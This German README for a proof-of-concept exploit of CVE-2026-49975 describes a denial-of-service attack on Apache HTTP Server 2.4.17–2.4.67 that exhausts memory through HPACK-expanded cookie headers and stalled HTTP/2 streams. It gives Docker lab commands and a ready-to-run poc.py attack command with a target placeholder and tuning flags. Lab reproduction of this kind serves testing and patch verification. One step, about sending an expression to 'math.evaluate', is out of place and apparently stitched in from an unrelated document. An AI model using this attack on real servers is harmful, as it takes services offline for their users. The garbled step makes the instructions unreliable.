
Proof-of-Concept-HTTP/2-Bomb-Exploit für CVE-2026-49975, eine Cookie-Header-Speichererschöpfungs-DoS in Apache HTTP Server 2.4.17-2.4.67, mit Docker-Lab und PoC-Skript.
★ CVE-2026-49975 HTTP/2 Bomb PoC ★
https://github.com/user-attachments/assets/89310771-f704-45d1-a6c3-d910de1dbc74
CVE-2026-49975 ist eine Denial-of-Service (DoS)-Schwachstelle in Apache HTTP Server. Die Schwachstelle tritt im HTTP/2-Anfrageverarbeitungspfad auf, wo mehrere
cookie-Header-Felder zusammengeführt werden können, ohne ordnungsgemäß gegenLimitRequestFieldsgezählt zu werden. Durch Senden einer kleinen HPACK-kodierten HTTP/2-Anfrage, die sich in vielecookie-Header-Felder entfaltet, kann ein Angreifer den Server dazu zwingen, während der Cookie-Header-Zusammenführung wiederholt Speicher zu allokieren. Der Angreifer kann dann die HTTP/2-Flusskontrolle nutzen, um die Übertragung der Antwort zu verzögern, wodurch die betroffenen Streams offen gehalten und die Freigabe des allokierten Speichers verhindert wird.
| Kategorie | Version |
|---|
| Anfällig | Apache HTTP Server 2.4.17 ≤ Version ≤ 2.4.67 |
| Gepatcht | Apache HTTP Server 2.4.68 oder später |
Erstellen und starten Sie die anfällige Apache HTTP Server-Umgebung.
docker build -t cve-2026-49975 .
docker run -d --name cve-2026-49975 --memory 8g -p 10081:80 cve-2026-49975
Nach dem Start der anfälligen Umgebung führen Sie die folgenden Schritte aus, um den Angriff zu reproduzieren.
docker stats cve-2026-49975
Beispielausgabe:
CONTAINER ID NAME CPU % MEM USAGE / LIMIT MEM %
xxxxxxxxxxxx cve-2026-49975 0.5% 35.2MiB / 8.0GiB 1.7%
Senden Sie den folgenden Ausdruck an math.evaluate (z. B. über die Berechnungseingabe der Anwendung).
python3 poc.py \
--host TARGET_IP \
--port 10081 \
--connections 10 \
--streams 100 \
--refs 4091 \
--initial-window 0 \
--hold 300 \
--drip-interval 2 \
--drip-bytes 1
Überprüfen Sie, dass der Speicherverbrauch des Apache-Containers ansteigt und hoch bleibt, während die Angriffs-Streams offen gehalten werden.